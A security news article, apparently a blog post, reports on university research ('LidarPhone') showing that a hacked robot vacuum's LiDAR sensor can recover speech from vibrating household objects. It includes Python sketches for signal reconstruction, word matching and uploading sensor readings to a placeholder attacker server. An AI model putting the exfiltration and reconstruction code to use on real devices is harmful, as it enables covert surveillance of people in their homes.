
Robot vacuum cleaners can eavesdrop on your conversations, researchers reveal

Graham CLULEY

November 20, 2020


* Researchers were able to use data collected by navigation sensors to record audio signals
* Ingenious technique may be able to spy on some sensitive data, but requires a large amount of effort

A team of researchers have explained how internet-connected robot vacuum cleaners can be hacked to eavesdrop on homeowners’ private conversations.

Researchers from the University of Maryland, College Park and the National University of Singapore have published research detailing how they were able to launch an ingenious attack that could stealthily snoop on people without their knowledge – despite there being no actual acoustic microphone built into the vacuum cleaner.

The technique exploits the smart sensors built into robot vacuum cleaners.

Self-driving cars, industrial robots, delivery robots, and robot vacuum cleaners all have a technology in common: Light Detection and Ranging (LiDAR) sensors. LiDAR uses a pulsed laser to help devices measure distances and navigate around obstacles – something that’s important whether it is for an autonomous vehicle on the highway or a robot vacuum cleaner navigating your home.

In a technical paper titled “Spying with Your Robot Vacuum Cleaner: Eavesdropping via Lidar Sensors”, the researchers showed how they managed to exploit a robot vacuum cleaner equipped with LiDAR – supposedly used for navigation – to secretly spy on homeowners.

The researchers were inspired by laser microphones, which have been in use since the Cold War.

In a typical spying scenario, a laser microphone will be targeted on the window of a room where a private conversation is taking place. The window’s glass bends and flexes a tiny amount in response to the sound vibrations caused by the conversation in the room – too little for humans to perceive, but enough to be picked up by the laser which bounces back off the reflective window to the eavesdropper.

The tiny variations in the reflected light signal can then be converted back into audio, allowing the conversation to be recorded remotely.
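To make the principle concrete, here is a minimal sketch (not the researchers’ actual code) of how a stream of reflected-light intensity readings might be turned back into an audio-like waveform: remove the constant component, then keep only the frequency band where speech energy sits. The function name, sample rate and filter band are illustrative assumptions.

```python
import numpy as np
from scipy.signal import butter, filtfilt

def light_to_audio(intensity, sample_rate_hz, low_hz=100.0, high_hz=1500.0):
    """Turn reflected-light intensity samples into an audio-like waveform.

    Illustrative sketch only: real LiDAR returns are far noisier and need
    much heavier processing than a single band-pass filter.
    """
    # Remove the constant (DC) level so only the vibration-induced
    # fluctuations remain.
    signal = intensity - np.mean(intensity)

    # 4th-order Butterworth band-pass keeping roughly the speech band.
    nyquist = sample_rate_hz / 2.0
    b, a = butter(4, [low_hz / nyquist, high_hz / nyquist], btype="band")
    filtered = filtfilt(b, a, signal)

    # Normalise to [-1, 1] so the result could be written out as audio.
    return filtered / (np.max(np.abs(filtered)) + 1e-12)

# Hypothetical usage: 'samples' stands in for the sensor's intensity
# readings, simulated here as random noise purely for illustration.
samples = np.random.randn(8000)
audio = light_to_audio(samples, sample_rate_hz=4000)
```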

Using this inspiration, the researchers built a proof-of-concept attack using a Xiaomi Roborock vacuum cleaning robot. They called their creation “LidarPhone”, which they described as a “remote, stealthy, and scalable acoustic eavesdropping attack.”

In a scenario presented by the researchers in an explanatory video, they described how a sensitive Zoom conversation could vibrate nearby objects such as a trashcan.

A compromised robot vacuum cleaner might then target the trashcan, and record its vibrations via its LiDAR sensors. The light intensity signal gathered by the hacked vacuum cleaner could be sent to a cloud-based server where it could later be analysed and converted back into the original audio by a remote attacker.
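As a rough illustration of that division of labour (capture on the device, heavy lifting in the cloud), the sketch below shows a compromised device forwarding raw intensity readings to a remote server. The server address, payload layout and function name are hypothetical and not taken from the paper.

```python
import numpy as np
import requests

# Hypothetical attacker infrastructure; "example.invalid" is a placeholder.
ATTACKER_SERVER = "https://example.invalid/lidar-upload"

def forward_readings(intensity_batch, session_id):
    """Forward a batch of raw LiDAR intensity readings for offline analysis.

    The device does no signal processing itself: in the scenario described,
    the audio reconstruction happens later, on the remote server.
    """
    payload = {
        "session": session_id,
        "samples": intensity_batch.tolist(),
    }
    try:
        requests.post(ATTACKER_SERVER, json=payload, timeout=10)
    except requests.RequestException:
        # This sketch simply gives up if the upload fails.
        pass

# Illustrative call with simulated sensor data.
forward_readings(np.random.randn(2000), session_id="demo-session")
```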

Of course, it’s less likely that a password would be stolen in this way – as passwords are not usually said out loud – but it might be a technique that could be used to steal sensitive information such as social security numbers, determine the identity or gender of a speaker, and so forth.

As a hacking technique, it’s not without some considerable challenges.

For one thing, it requires malicious hackers to have remote access to the robot vacuum cleaner and its LiDAR data.

In addition, most surfaces are not as good at reflecting signals as windows and mirrors, which means that a robot vacuum cleaner may be collecting data with a low signal-to-noise ratio.

Furthermore, the hardware limitations of robot vacuum cleaners mean that only a low sampling rate can be achieved, less than that required to capture audio intelligible to the human ear.
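A quick back-of-the-envelope illustration, using an invented sampling rate rather than any figure measured in the paper: by the Nyquist limit, a sampled signal can only represent frequencies up to half its sampling rate.

```python
# Illustrative figures only; the paper's measured LiDAR rate is not quoted here.
LIDAR_RATE_HZ = 2000       # hypothetical samples per second from the sensor
TELEPHONE_RATE_HZ = 8000   # standard narrowband telephone audio

# A signal sampled at rate f can only represent frequencies up to f / 2.
print(f"LiDAR sketch captures frequencies up to {LIDAR_RATE_HZ / 2:.0f} Hz")
print(f"Telephone-quality audio captures up to {TELEPHONE_RATE_HZ / 2:.0f} Hz")
```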

But not to be outdone, the researchers determined that they could train their systems using machine learning to help them filter out noise and improve the signal they received from the eavesdropping vacuum cleaner.

Even that, however, doesn’t make the audio of good enough quality for the human ear to tell the difference between, say, the number “seven” being spoken and the number “eight.” Which is why the researchers suggested that a spying system should be trained with just a small set of words (such as the numbers one to ten), and use pattern matching to make a good prediction as to what has really been said.
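A minimal sketch of that kind of small-vocabulary pattern matching is shown below, assuming a handful of labelled training clips per word. The averaged log-spectrogram features and nearest-neighbour matching are deliberate simplifications of the machine-learning pipeline the researchers describe, and all names and data here are hypothetical.

```python
import numpy as np
from scipy.signal import spectrogram

def features(audio, sample_rate_hz):
    """Summarise a short clip as its log-spectrogram averaged over time."""
    _, _, spec = spectrogram(audio, fs=sample_rate_hz, nperseg=128)
    return np.log(spec + 1e-10).mean(axis=1)

def predict_word(clip, templates, sample_rate_hz):
    """Nearest-neighbour match against labelled example clips.

    'templates' maps each word in the small vocabulary (e.g. "one" to "ten")
    to a list of training recordings of that word being spoken.
    """
    clip_feat = features(clip, sample_rate_hz)
    best_word, best_dist = None, np.inf
    for word, examples in templates.items():
        for example in examples:
            dist = np.linalg.norm(clip_feat - features(example, sample_rate_hz))
            if dist < best_dist:
                best_word, best_dist = word, dist
    return best_word

# Hypothetical usage with random stand-in audio; real training data would be
# recordings of each word captured under the same conditions as the attack.
rate = 4000
templates = {word: [np.random.randn(rate)] for word in ("one", "two", "three")}
print(predict_word(np.random.randn(rate), templates, rate))
```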

Graham CLULEY

Graham Cluley is an award-winning security blogger, researcher and public speaker. He has been working in the computer security industry since the early 1990s.
